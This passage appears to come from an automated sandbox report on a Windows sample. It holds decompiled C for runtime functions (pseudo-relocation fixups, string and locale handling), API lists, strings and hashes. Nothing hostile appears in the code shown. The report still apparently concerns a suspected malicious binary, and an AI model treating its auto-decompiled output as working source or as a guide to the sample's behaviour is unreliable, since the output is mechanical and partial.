				_t19 = _t104 + 8; // 0x8
				_t81 = _t19;
				_t119 =  *_t104;
				_t110 = _t81;
				_v116 = _t81;
				_t82 =  *((intOrPtr*)(_t104 + 4));
				if(_t119 == _t110) {
					_t120 = _t82 + 1;
					_t82 = 0xffffffff;
					if(_t120 != 0) {
						_v140 = _t120;
						_v144 = _t110;
						 *_t132 =  &_v68;
						memcpy(??, ??, ??);
						_t82 =  *((intOrPtr*)(_t104 + 4));
					}
				} else {
					_v76 = _t119;
					_v68 =  *((intOrPtr*)(_t104 + 8));
				}
				_v72 = _t82;
				 *((intOrPtr*)(_t104 + 4)) = 0;
				 *_t104 = _v116;
				 *((char*)(_t104 + 8)) = 0;
				 *_t132 = _a12;
				_v136 = strlen(??);
				_v144 = 0;
				_v140 = _a12;
				 *_t132 = 0;
				_t105 = E01462400(_t104,  &_v76, _t126, _t127, _t128);
				_t133 = _t132 - 0x10;
				_v100 =  &_v92;
				_t112 =  *_t105;
				_t37 = _t105 + 8; // 0x8
				_t121 = _t37;
				_t89 =  *((intOrPtr*)(_t105 + 4));
				if(_t112 == _t121) {
					_t113 = _t89 + 1;
					_t89 = 0xffffffff;
					if(_t113 != 0) {
						_v144 = _t121;
						_v140 = _t113;
						_v116 = _t121;
						 *_t133 =  &_v92;
						memcpy(??, ??, ??);
						_t89 =  *((intOrPtr*)(_t105 + 4));
						_t121 = _v116;
					}
				} else {
					_v100 = _t112;
					_v92 =  *((intOrPtr*)(_t105 + 8));
				}
				_v96 = _t89;
				 *_t105 = _t121;
				 *((intOrPtr*)(_t105 + 4)) = 0;
				 *((char*)(_t105 + 8)) = 0;
				 *_t133 =  &_v100;
				E01451B90(_t127);
				_t92 = _v100;
				_t134 = _t133 - 4;
				if(_t92 !=  &_v92) {
					 *_t134 = _t92;
					L01477910();
				}
				_t93 = _v76;
				if(_t93 !=  &_v68) {
					 *_t134 = _t93;
					L01477910();
				}
				_t94 = _v52;
				if(_t94 != _v120) {
					 *_t134 = _t94;
					L01477910();
				}
				_t95 = _v112;
				 *_t127 = 0x14b17cc;
				 *((intOrPtr*)(_t127 + 0xc)) = _t126;
				 *((intOrPtr*)(_t127 + 8)) = _t95;
				return _t95;
			}

0x01440425
0x01440428
0x0144042b
0x0144042e
0x01440431
0x01440436
0x01440439
0x01440441
0x0144064b
0x0144064e
0x01440654
0x01440659
0x0144065c
0x01440447
0x01440447
0x0144044a
0x01440451
0x01440454
0x01440457
0x0144045e
0x01440618
0x01440622
0x0144062a
0x01440632
0x01440639
0x01440464
0x01440464
0x0144046e
0x01440476
0x0144047e
0x01440485
0x01440485
0x0144048a
0x0144048a
0x0144048d
0x01440497
0x0144049f
0x014404a7
0x014404b3
0x014404b8
0x014404bb
0x014404be
0x014404be
0x014404c1
0x014404c3
0x014404c5
0x014404c8
0x014404cd
0x014405b0
0x014405b3
0x014405ba
0x014405c3
0x014405c7
0x014405cb
0x014405ce
0x014405d3
0x014405d3
0x014404d3
0x014404d3
0x014404d9
0x014404d9
0x014404dc
0x014404e2
0x014404e9
0x014404ee
0x014404f2
0x014404fd
0x01440504
0x0144050c
0x01440510
0x0144051c
0x01440521
0x01440524
0x01440527
0x01440529
0x01440529
0x0144052c
0x01440531
0x014405e0
0x014405e3
0x014405ea
0x014405f3
0x014405f7
0x014405fb
0x014405fe
0x01440601
0x01440606
0x01440609
0x01440609
0x01440537
0x01440537
0x0144053d
0x0144053d
0x01440540
0x01440548
0x0144054a
0x01440551
0x01440555
0x01440558
0x0144055d
0x01440563
0x01440568
0x0144056a
0x0144056d
0x0144056d
0x01440572
0x0144057a
0x0144057c
0x0144057f
0x0144057f
0x01440584
0x0144058c
0x0144058e
0x01440591
0x01440591
0x01440596
0x01440599
0x0144059f
0x014405a2
0x014405ac

APIs

Part of subcall function 01462400: memmove.MSVCRT ref: 0146249D
Part of subcall function 01462400: memcpy.MSVCRT ref: 014624C8

strlen.MSVCRT ref: 014404F5
memcpy.MSVCRT ref: 014405CE

Strings

iostream error, xrefs: 01440622
Unknown error, xrefs: 0144046E

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memcpy$memmovestrlen
String ID: Unknown error$iostream error
API String ID: 1234831610-3609051425
Opcode ID: 8eb84a43928c9cc0888dca798fab1a6fd0c24c03dc8d5c0d99cada483f89d191
Instruction ID: 529843ed30d151934ce3b5151be29a93ea78e13827bbbe25d1cc4b9600d238cd
Opcode Fuzzy Hash: 8eb84a43928c9cc0888dca798fab1a6fd0c24c03dc8d5c0d99cada483f89d191
Instruction Fuzzy Hash: 5A61E1B49043099FDB04DFA9C08469EBBF1FF98314F24892EE8899B355E77498458F92

Uniqueness

Uniqueness Score: -1.00%

Function 013DA7F0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 013DA80F
ReleaseSemaphore.KERNEL32 ref: 013DA893

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: ReleaseSemaphoremalloc
String ID:
API String ID: 755742884-0
Opcode ID: 409978ffe112b148ccd99761383ef1a575e50062f634c9a0ecf67395a52354c7
Instruction ID: 425a04cce8119dc927b255e7b7413836b2258c6429cb7d4df6d81633cad0f984
Opcode Fuzzy Hash: 409978ffe112b148ccd99761383ef1a575e50062f634c9a0ecf67395a52354c7
Instruction Fuzzy Hash: 543149B26063018FD7209F28E648B16BFF1BB41318F46851CD9588B3A8E7B5E495CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013DAC90 Relevance: 7.6, APIs: 5, Instructions: 78synchronizationCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 013DAC9C
ReleaseSemaphore.KERNEL32 ref: 013DAD2C
CreateSemaphoreW.KERNEL32 ref: 013DAD77
WaitForSingleObject.KERNEL32 ref: 013DADC0

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWaitmalloc
String ID:
API String ID: 2768075653-0
Opcode ID: 1aadfa0c23ac0462e058c49f7060550c1beb81ed1014a1a87e12a51bc80036ce
Instruction ID: f15aea12ab05340178fba30e0c3917bb44c5aedaa53a782ead307a7615acc949
Opcode Fuzzy Hash: 1aadfa0c23ac0462e058c49f7060550c1beb81ed1014a1a87e12a51bc80036ce
Instruction Fuzzy Hash: 103167B26063018FD720AF28E658B16BFF1BB45319F01861CD9488B3A8E7B5E454CF92

Uniqueness

Uniqueness Score: -1.00%

Function 014721A0 Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 014721B5
strlen.MSVCRT ref: 01472203
memcpy.MSVCRT ref: 01472220
setlocale.MSVCRT ref: 01472234
setlocale.MSVCRT ref: 0147226A

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 8cf253397995403c507fe57c15b706fa6c8b9f3e25ffbde094cb00f7629c3ac9
Instruction ID: ce0465826933c84ca07212a6350feaa3934a1941f858b77146ba01f345f2371e
Opcode Fuzzy Hash: 8cf253397995403c507fe57c15b706fa6c8b9f3e25ffbde094cb00f7629c3ac9
Instruction Fuzzy Hash: 3521CFB4A093119FD340AF6DD48466EFBE0EF98218F42896EE4D8D7311E278D9508B42

Uniqueness

Uniqueness Score: -1.00%

Function 013DB240 Relevance: 7.5, APIs: 5, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 013DB26C
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,013DB48E), ref: 013DB27A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,013DB48E), ref: 013DB2B0

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: AllocCreateErrorLastSemaphore
String ID:
API String ID: 2256031600-0
Opcode ID: d10e853e9906248108b26dfc56c19b76a0d7b7874eecce80b6649fe5eb16678e
Instruction ID: ed133345154d6a9187d4c901faf53dcb97a0092d8a578de3339a99f7ca8eb571
Opcode Fuzzy Hash: d10e853e9906248108b26dfc56c19b76a0d7b7874eecce80b6649fe5eb16678e
Instruction Fuzzy Hash: E0F0DAB58097029ED320BF7CD50C32EBAF5AB46318F918A1CD169973E9EB748058CF52

Uniqueness

Uniqueness Score: -1.00%

Function 013D5660 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 213
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E013D5660(signed char* __ebx, void* __edi, signed int __esi) {
				void* _v16;
				char _v32;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _v56;
				void* _v57;
				signed int _v60;
				long long _v64;
				void* _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				long long _v112;
				long long _v120;
				long long _v128;
				signed int _v132;
				char _v136;
				signed int _t66;
				void* _t72;
				int _t79;
				signed int _t82;
				signed int _t83;
				intOrPtr _t84;
				signed char _t85;
				signed int _t98;
				intOrPtr _t104;
				signed int _t107;
				signed int _t109;
				signed int* _t117;
				signed int _t118;
				signed int* _t120;
				signed int _t123;
				intOrPtr _t124;
				char* _t125;
				signed int _t127;
				signed int _t128;
				signed int _t131;
				void* _t140;
				void* _t141;
				char** _t142;
				intOrPtr* _t145;
				long long _t150;

				_t121 = __esi;
				_t96 = __ebx;
				_push(__edi);
				_push(__esi);
				_push(__ebx);
				_t141 = _t140 - 0x4c;
				_t66 =  *0x14f2064;
				_v56 = _t66;
				if(_t66 == 0) {
					 *0x14f2064 = 1;
					_t72 = E013D6170(0x1b + (E013D5F80() + _t67 * 4) * 4 >> 4 << 4);
					 *0x14f2068 = 0;
					_t142 = _t141 - _t72;
					 *0x14f206c =  &_v57 & 0xfffffff0;
					_t66 = 0;
					__eflags = 0x14b27e0 - 7;
					if(0x14b27e0 <= 7) {
						goto L1;
					} else {
						_t107 =  *0x14b27e0; // 0x0
						__eflags = 0x14b27e0 - 0xb;
						if(0x14b27e0 > 0xb) {
							L16:
							__eflags = _t107;
							if(_t107 != 0) {
								_t117 = 0x14b27e0;
								goto L38;
							} else {
								_t66 =  *0x14b27e4; // 0x0
								__eflags = _t66 |  *0x14b27e8;
								if((_t66 |  *0x14b27e8) != 0) {
									_t117 = 0x14b27e0;
									goto L7;
								} else {
									_t107 =  *0x14b27ec; // 0x0
									_t117 = 0x14b27ec;
									goto L5;
								}
							}
						} else {
							_t117 = 0x14b27e0;
							L5:
							__eflags = _t107;
							if(_t107 != 0) {
								L38:
								__eflags = _t117 - 0x14b27e0;
								if(_t117 >= 0x14b27e0) {
									goto L1;
								} else {
									do {
										_t50 =  &(_t117[1]); // 0x0
										_t98 =  *_t50;
										_t123 =  *_t117;
										_t117 =  &(_t117[2]);
										_t51 = _t98 + 0x13c0000; // 0x905a4d
										_t124 = _t123 +  *_t51;
										_t52 = _t98 + 0x13c0000; // 0x13c0000
										E013D5500(_t52, _t98, _t117, _t124);
										 *((intOrPtr*)(_t98 + 0x13c0000)) = _t124;
										__eflags = _t117 - 0x14b27e0;
									} while (_t117 < 0x14b27e0);
									goto L26;
								}
							} else {
								_t8 =  &(_t117[1]); // 0x0
								_t66 =  *_t8;
								L7:
								__eflags = _t66;
								if(_t66 != 0) {
									goto L38;
								} else {
									_t9 =  &(_t117[2]); // 0x0
									_t66 =  *_t9;
									__eflags = _t66 - 1;
									if(__eflags != 0) {
										_v88 = _t66;
										 *_t142 = "  Unknown pseudo relocation protocol version %d.\n";
										E013D54A0(_t96, _t117, _t121, __eflags);
										_t145 = _t142 - 0x3c;
										_t82 =  *0x14f2070;
										_t150 = _v64;
										__eflags = _t82;
										if(_t82 == 0) {
											st0 = _t150;
											st0 = _t150;
											st0 = _t150;
										} else {
											asm("fxch st0, st2");
											_v128 = _t150;
											_v120 = _t150;
											_v136 = _v88;
											_v112 = _t150;
											_v132 = _v84;
											 *_t145 =  &_v136;
											_t82 =  *_t82();
										}
										return _t82;
									} else {
										_t120 =  &(_t117[3]);
										__eflags = _t120 - 0x14b27e0;
										if(_t120 >= 0x14b27e0) {
											goto L1;
										} else {
											do {
												_t83 =  *_t120;
												_t10 =  &(_t120[1]); // 0x0
												_t107 =  *_t10;
												_t11 = _t83 + 0x13c0000; // 0x13c0000
												_t12 = _t83 + 0x13c0000; // 0x905a4d
												_t84 =  *_t12;
												_t13 = _t107 + 0x13c0000; // 0x13c0000
												_t96 = _t13;
												_v48 = _t11;
												_v52 = _t84;
												_t104 = _t84;
												_t16 =  &(_t120[2]); // 0x0
												_t85 =  *_t16;
												_t127 = _t85 & 0x000000ff;
												_v60 = _t127;
												__eflags = _t127 - 0x10;
												if(_t127 == 0x10) {
													L21:
													_t30 = _t107 + 0x13c0000; // 0x905a4d
													_t128 =  *_t30 & 0x0000ffff;
													__eflags = _t128;
													_t129 =  <  ? _t128 | 0xffff0000 : _t128;
													_t130 = ( <  ? _t128 | 0xffff0000 : _t128) - _v48;
													_t121 = ( <  ? _t128 | 0xffff0000 : _t128) - _v48 + _v52;
													__eflags = _t85 & 0x000000e0;
													if((_t85 & 0x000000e0) != 0) {
														L24:
														E013D5500(_t96, _t96, _t120, _t121);
														 *_t96 = _t121;
														goto L25;
													} else {
														__eflags = _t121 - 0xffff8000;
														if(__eflags < 0) {
															goto L15;
														} else {
															__eflags = _t121 - 0xffff;
															if(__eflags > 0) {
																goto L15;
															} else {
																goto L24;
															}
														}
													}
												} else {
													__eflags = _t127 - 0x20;
													if(_t127 != 0x20) {
														__eflags = _t127 - 8;
														if(__eflags == 0) {
															_t131 =  *_t96 & 0x000000ff;
															_t107 = _t131 | 0xffffff00;
															__eflags =  *_t96;
															_t132 =  <  ? _t107 : _t131;
															_t133 = ( <  ? _t107 : _t131) - _v48;
															_t121 = ( <  ? _t107 : _t131) - _v48 + _t104;
															__eflags = _t85 & 0x000000e0;
															if((_t85 & 0x000000e0) != 0) {
																L35:
																E013D5500(_t96, _t96, _t120, _t121);
																 *_t96 = _t121;
																goto L25;
															} else {
																__eflags = _t121 - 0xffffff80;
																if(__eflags < 0) {
																	goto L15;
																} else {
																	__eflags = _t121 - 0xff;
																	if(__eflags > 0) {
																		goto L15;
																	} else {
																		goto L35;
																	}
																}
															}
														} else {
															 *_t142 = "  Unknown pseudo relocation bit size %d.\n";
															_v88 = _v60;
															_t85 = E013D54A0(_t96, _t120, _t127, __eflags);
															goto L21;
														}
													} else {
														_t121 = _v52 - _v48 +  *_t96;
														__eflags = _t85 & 0x000000e0;
														if((_t85 & 0x000000e0) != 0) {
															L36:
															E013D5500(_t96, _t96, _t120, _t121);
															 *_t96 = _t121;
															goto L25;
														} else {
															__eflags = _t121;
															if(__eflags < 0) {
																goto L36;
															} else {
																L15:
																_v76 = _t121;
																_v84 = _t96;
																_v80 = _v52;
																 *_t142 = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.\n";
																_v88 = _v60;
																_t66 = E013D54A0(_t96, _t120, _t121, __eflags);
																goto L16;
															}
														}
													}
												}
												goto L46;
												L25:
												_t120 =  &(_t120[3]);
												__eflags = _t120 - 0x14b27e0;
											} while (_t120 < 0x14b27e0);
											L26:
											_t66 =  *0x14f2068;
											__eflags = _t66;
											if(_t66 <= 0) {
												goto L1;
											} else {
												_t118 = _v56;
												_t125 =  &_v32;
												do {
													_t79 =  *0x14f206c + (_t118 + _t118 * 4) * 4;
													_t109 =  *_t79;
													__eflags = _t109;
													if(_t109 != 0) {
														_v80 = _t125;
														_v84 = _t109;
														_v88 =  *(_t79 + 8);
														 *_t142 =  *(_t79 + 4);
														_t79 = VirtualProtect(??, ??, ??, ??);
														_t142 = _t142 - 0x10;
													}
													_t118 = _t118 + 1;
													__eflags = _t118 -  *0x14f2068;
												} while (_t118 <  *0x14f2068);
												return _t79;
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					return _t66;
				}
				L46:
			}

0x013d5660
0x013d5660
0x013d5663
0x013d5664
0x013d5665
0x013d5666
0x013d5669
0x013d566e
0x013d5673
0x013d5680
0x013d569f
0x013d56a4
0x013d56ae
0x013d56b7
0x013d56c1
0x013d56c6
0x013d56c9
0x00000000
0x013d56cb
0x013d56cb
0x013d56d1
0x013d56d4
0x013d5780
0x013d5780
0x013d5782
0x013d58d0
0x00000000
0x013d5788
0x013d5788
0x013d578f
0x013d5795
0x013d5910
0x00000000
0x013d579b
0x013d579b
0x013d57a1
0x00000000
0x013d57a1
0x013d5795
0x013d56da
0x013d56da
0x013d56df
0x013d56df
0x013d56e1
0x013d58d5
0x013d58d5
0x013d58db
0x00000000
0x013d58e1
0x013d58e1
0x013d58e1
0x013d58e1
0x013d58e4
0x013d58e6
0x013d58e9
0x013d58e9
0x013d58ef
0x013d58f5
0x013d58fa
0x013d5900
0x013d5900
0x00000000
0x013d5908
0x013d56e7
0x013d56e7
0x013d56e7
0x013d56ea
0x013d56ea
0x013d56ec
0x00000000
0x013d56f2
0x013d56f2
0x013d56f2
0x013d56f5
0x013d56f8
0x013d591a
0x013d591e
0x013d5925
0x013d5930
0x013d5933
0x013d5940
0x013d5944
0x013d5946
0x013d5971
0x013d5973
0x013d5975
0x013d5948
0x013d5948
0x013d594e
0x013d5952
0x013d5956
0x013d595e
0x013d5962
0x013d596a
0x013d596d
0x013d596d
0x013d597a
0x013d56fe
0x013d56fe
0x013d5701
0x013d5707
0x00000000
0x013d5710
0x013d5710
0x013d5710
0x013d5712
0x013d5712
0x013d5715
0x013d571b
0x013d571b
0x013d5721
0x013d5721
0x013d5727
0x013d572a
0x013d572d
0x013d572f
0x013d572f
0x013d5732
0x013d5735
0x013d5738
0x013d573b
0x013d57d0
0x013d57d0
0x013d57d0
0x013d57df
0x013d57e2
0x013d57e5
0x013d57e8
0x013d57eb
0x013d57ed
0x013d5807
0x013d5809
0x013d580e
0x00000000
0x013d57ef
0x013d57ef
0x013d57f5
0x00000000
0x013d57fb
0x013d57fb
0x013d5801
0x00000000
0x00000000
0x00000000
0x00000000
0x013d5801
0x013d57f5
0x013d5741
0x013d5741
0x013d5744
0x013d57b0
0x013d57b3
0x013d5880
0x013d5885
0x013d588b
0x013d588e
0x013d5891
0x013d5894
0x013d5896
0x013d5898
0x013d58af
0x013d58b1
0x013d58b8
0x00000000
0x013d589a
0x013d589a
0x013d589d
0x00000000
0x013d58a3
0x013d58a3
0x013d58a9
0x00000000
0x00000000
0x00000000
0x00000000
0x013d58a9
0x013d589d
0x013d57b9
0x013d57bc
0x013d57c3
0x013d57c7
0x00000000
0x013d57c7
0x013d5746
0x013d574c
0x013d574e
0x013d5750
0x013d58c0
0x013d58c2
0x013d58c7
0x00000000
0x013d5756
0x013d5756
0x013d5758
0x00000000
0x013d575e
0x013d575e
0x013d5761
0x013d5765
0x013d5769
0x013d5770
0x013d5777
0x013d577b
0x00000000
0x013d577b
0x013d5758
0x013d5750
0x013d5744
0x00000000
0x013d5811
0x013d5811
0x013d5814
0x013d5814
0x013d5820
0x013d5820
0x013d5825
0x013d5827
0x00000000
0x013d582d
0x013d5833
0x013d5836
0x013d5840
0x013d5849
0x013d584c
0x013d584e
0x013d5850
0x013d5852
0x013d5856
0x013d585d
0x013d5864
0x013d5867
0x013d5869
0x013d5869
0x013d586c
0x013d586f
0x013d586f
0x013d587e
0x013d587e
0x013d5827
0x013d5707
0x013d56f8
0x013d56ec
0x013d56e1
0x013d56d4
0x013d5675
0x013d5675
0x013d567c
0x013d567c
0x00000000

Strings

Unknown pseudo relocation bit size %d., xrefs: 013D57BC
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 013D5770
Unknown pseudo relocation protocol version %d., xrefs: 013D591E

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 360f7f55f9628537edd140ee9c9d6c4d15b9b05a86ac3ac9da57b7f311f3a9ff
Instruction ID: 7e7c4dd37550d3bf5a231cf1be07fe1a5e3ce88a88e182a758997e3f6327c055
Opcode Fuzzy Hash: 360f7f55f9628537edd140ee9c9d6c4d15b9b05a86ac3ac9da57b7f311f3a9ff
Instruction Fuzzy Hash: 2181AF77E00215CFCB10DF2CE880999BBF5FF84258F564A5AE988A7365D330E914CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013E8A80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E013E8A80(int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __ebp, char* _a8) {
				char* _v24;
				int _t9;
				intOrPtr* _t14;
				void* _t18;
				char* _t21;
				void* _t24;
				char** _t25;

				_t14 = __ecx;
				_t25 = _t24 - 0x14;
				 *_t25 = _a8;
				_t21 = strerror(__ebx);
				 *_t14 = _t14 + 8;
				if(_t21 == 0) {
					 *_t25 = "basic_string: construction from null is not valid";
					E014796C0(_t18, __edi);
					return "__gnu_cxx::__concurrence_lock_error";
				} else {
					 *_t25 = _t21;
					_t9 = strlen(??);
					 *_t25 = _t21;
					_v24 =  &(_t21[_t9]);
					E01462CC0(_t14);
					return _t14;
				}
			}

0x013e8a82
0x013e8a84
0x013e8a8b
0x013e8a93
0x013e8a98
0x013e8a9c
0x013e8ac3
0x013e8aca
0x013e8ad5
0x013e8a9e
0x013e8a9e
0x013e8aa1
0x013e8aa6
0x013e8aad
0x013e8ab1
0x013e8ac0
0x013e8ac0

APIs

strerror.MSVCRT ref: 013E8A8E
strlen.MSVCRT ref: 013E8AA1

Strings

__gnu_cxx::__concurrence_lock_error, xrefs: 013E8AD0
basic_string: construction from null is not valid, xrefs: 013E8AC3

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: strerrorstrlen
String ID: __gnu_cxx::__concurrence_lock_error$basic_string: construction from null is not valid
API String ID: 960536887-1066207237
Opcode ID: ea18d45f0c9496089ae9fe725aae8f16c2c596249e84eb4f893ec024964ab7bf
Instruction ID: 27632e4320a44dad3ee05b29a9c3f905ece517176d372494f5be156edcc24d69
Opcode Fuzzy Hash: ea18d45f0c9496089ae9fe725aae8f16c2c596249e84eb4f893ec024964ab7bf
Instruction Fuzzy Hash: 0BF01CF1A1972147CB007F2D848455EBAE4AB2A614F87096EE8849B354D67498448BE2

Uniqueness

Uniqueness Score: -1.00%

Function 013E3AF9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 013E3B12
strchr.MSVCRT ref: 013E3B22
atoi.MSVCRT ref: 013E3B35

Strings

., xrefs: 013E3B17

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
